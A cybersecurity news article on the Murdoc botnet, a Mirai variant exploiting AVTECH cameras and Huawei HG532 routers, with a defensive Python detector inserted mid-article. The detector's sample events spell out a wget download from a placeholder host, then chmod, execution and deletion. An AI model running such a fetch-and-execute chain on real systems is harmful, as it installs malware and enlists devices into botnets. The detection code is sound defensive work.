Murdoc Botnet Exploits IoT Vulnerabilities, Posing Major Cyber Threat

January 23, 2025

The discovery of the Murdoc Botnet, a new and potent variant of the notorious Mirai botnet, has heightened concerns within the cybersecurity community. Uncovered by diligent Qualys researchers, this latest menace takes advantage of vulnerabilities found in widely used IoT devices like AVTECH cameras and Huawei HG532 routers. By compromising these devices, cybercriminals can form extensive botnet networks, executing a variety of malicious activities that pose significant cyber threats to enterprises and consumers alike.

The Evolution of Mirai: From 2016 to Murdoc

First identified in late August 2016, the Mirai botnet has had a profound and enduring impact on the field of cybersecurity. Its ability to exploit even a single outdated or unpatched device has been a source of persistent trouble, as emphasized by Jason Soroko, Senior Fellow at Sectigo. This ongoing threat underlines the critical need for proactive security measures to defend networks from such impactful cybersecurity risks.

The Murdoc Botnet campaign, which began around mid-2024, has shown markedly enhanced capabilities when compared to the original Mirai botnet iteration. It predominantly targets IoT devices like AVTECH cameras and Huawei HG532 routers, leveraging well-known vulnerabilities such as CVE-2024-7029 and CVE-2017-17215. Notably, the frequency of these attacks saw a significant uptick starting in July 2024, with countries like Malaysia, Thailand, Mexico, and Indonesia identified as the most severely affected regions.

Technical Mechanics of the Murdoc Botnet

A central component of the Murdoc Botnet’s malicious operations involves the use of ELF files and shell scripts to deploy malware onto compromised devices. During their meticulous threat-hunting analysis, the Qualys Threat Research Unit uncovered significant evidence of widespread Mirai malware distribution. They identified over 1300 affected IP addresses, underscoring the expansive reach of this alarming campaign.

Furthermore, the investigation revealed the operation of more than 100 command-and-control (C2) servers that manage the compromised devices and distribute Mirai malware payloads. These C2 servers play a crucial role in facilitating the botnet’s expansion by issuing operational commands and maintaining communication with infected devices. The researchers at Qualys have provided detailed insights into the operational mechanics of these C2 servers as well as the embedded payloads within the botnet.

Exploiting IoT Device Vulnerabilities

The Murdoc Botnet shares several characteristics with the original Mirai botnet, particularly its focus on *nix-based systems. It compromises devices such as AVTECH cameras and Huawei routers through known exploits and then deploys its payload. Once installed, the payload runs a fixed sequence of commands to set itself up and start operating.

For example, the payload targeting AVTECH cameras employs sophisticated shell scripts to fetch and execute malicious binaries, all while meticulously removing traces of the attack to avoid detection. Research data revealed over 500 samples of ELF and shell script files, which highlight the extensive nature of these coordinated attacks. The botnet’s final payload is crafted for further malicious activities, such as launching Distributed Denial-of-Service (DDoS) attacks from the compromised devices.

Advanced Techniques and Evasion Strategies

Jason Soroko notes that the Murdoc Botnet’s utilization of shell scripts and ELF binaries embodies how Mirai operators have adeptly adapted core techniques like command injection and network reconnaissance to encompass a broader range of platforms. These techniques, including the usage of base64 encoding and common administrative utilities, help the malware avoid detection, complicating incident response efforts.

Upon analyzing the shell scripts employed by the Murdoc Botnet, researchers observed that these scripts fetch the malware payload with the wget command, mark it executable with chmod, run it, and then delete the scripts to obscure their activity. By drawing on GTFOBins, a well-known catalogue of standard Unix binaries that can be abused to run commands or bypass restrictions, the malicious scripts rely only on utilities already present on the compromised system, demonstrating the high level of sophistication involved in these attacks.

Proactive Measures to Counter the Threat

In response to this evolving threat, Qualys recommends that organizations adopt several proactive measures to fortify their defenses. One key recommendation is the regular monitoring of suspicious activities, with a particular focus on detecting unusual processes or network traffic originating from untrusted binaries or shell scripts. It is also crucial to exercise caution when dealing with shell scripts, avoiding execution of those from unknown or untrusted sources.
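As an added illustration of the monitoring the article recommends (this is not code from Qualys or from the botnet), the detector below looks for the download, chmod, execute, delete chain described above in process-execution events; the event format, the constructed sample events and the placeholder host are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of process-execution events (not real telemetry):
# "<ts> ppid=<n> comm=<name> cmd=<argv...>", where ppid ties each command
# to the parent shell that spawned it. The first session shows the
# fetch -> chmod -> execute -> delete chain; the second is a benign update.
SAMPLE_EVENTS = """\
1001 ppid=412 comm=wget cmd=wget http://placeholder.invalid/drop -O /tmp/.x
1002 ppid=412 comm=chmod cmd=chmod +x /tmp/.x
1003 ppid=412 comm=.x cmd=/tmp/.x
1004 ppid=412 comm=rm cmd=rm -f /tmp/.x
1005 ppid=777 comm=wget cmd=wget https://updates.example/pkg.tgz -O /opt/pkg.tgz
1006 ppid=777 comm=tar cmd=tar xzf /opt/pkg.tgz -C /opt
"""

EVENT_RE = re.compile(r"^(\d+) ppid=(\d+) comm=(\S+) cmd=(.*)$")
DOWNLOADERS = {"wget", "curl"}

def parse_events(text):
    """Return [(ts, ppid, comm, argv)] for every well-formed event line."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            ts, ppid, comm, cmd = m.groups()
            events.append((int(ts), int(ppid), comm, cmd.split()))
    return events

def stage_of(comm, argv):
    """Map one exec event to a (stage, file path) pair, or None if irrelevant."""
    if comm in DOWNLOADERS:
        for flag in ("-O", "-o"):              # output-file flag of wget/curl
            if flag in argv and argv.index(flag) + 1 < len(argv):
                return "download", argv[argv.index(flag) + 1]
    elif comm == "chmod" and len(argv) >= 3:
        return "chmod", argv[-1]
    elif comm == "rm" and len(argv) >= 2:
        return "delete", argv[-1]
    elif argv and argv[0].startswith("/"):    # direct execution by absolute path
        return "exec", argv[0]
    return None

def flag_sessions(text, min_stages=3):
    """Flag (ppid, path, stages) where one shell drove >= min_stages stages on a file."""
    seen = defaultdict(set)                    # (ppid, path) -> stages observed
    for _ts, ppid, comm, argv in sorted(parse_events(text)):
        hit = stage_of(comm, argv)
        if hit:
            seen[(ppid, hit[1])].add(hit[0])
    return [(ppid, path, sorted(st)) for (ppid, path), st in seen.items()
            if len(st) >= min_stages]
```

On the sample events only the /tmp/.x session is flagged; the benign package download never reaches the chmod, execute or delete stages.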

Additionally, keeping all systems and firmware updated with the latest security patches is essential for mitigating known vulnerabilities. James Scobey, Chief Information Security Officer at Keeper Security, underscores the persistent and evolving nature of IoT vulnerabilities, as evidenced by the discoveries involving the Murdoc Botnet. He emphasizes that improved IoT security practices are paramount, including hardening device configurations, managing passwords, and restricting unauthorized access.

The Importance of Zero-Trust Principles

The Murdoc Botnet shows how compromised everyday devices become tools for cyberattacks. Once AVTECH cameras and Huawei HG532 routers are hijacked into a botnet, operators can use them to launch Distributed Denial of Service (DDoS) attacks, steal sensitive information, and spread malware, risks that fall on businesses and individual consumers alike. This underscores the need for robust security measures across the IoT landscape: enterprises and consumers must stay vigilant and apply stringent security controls to protect their networks and personal data from these threats.
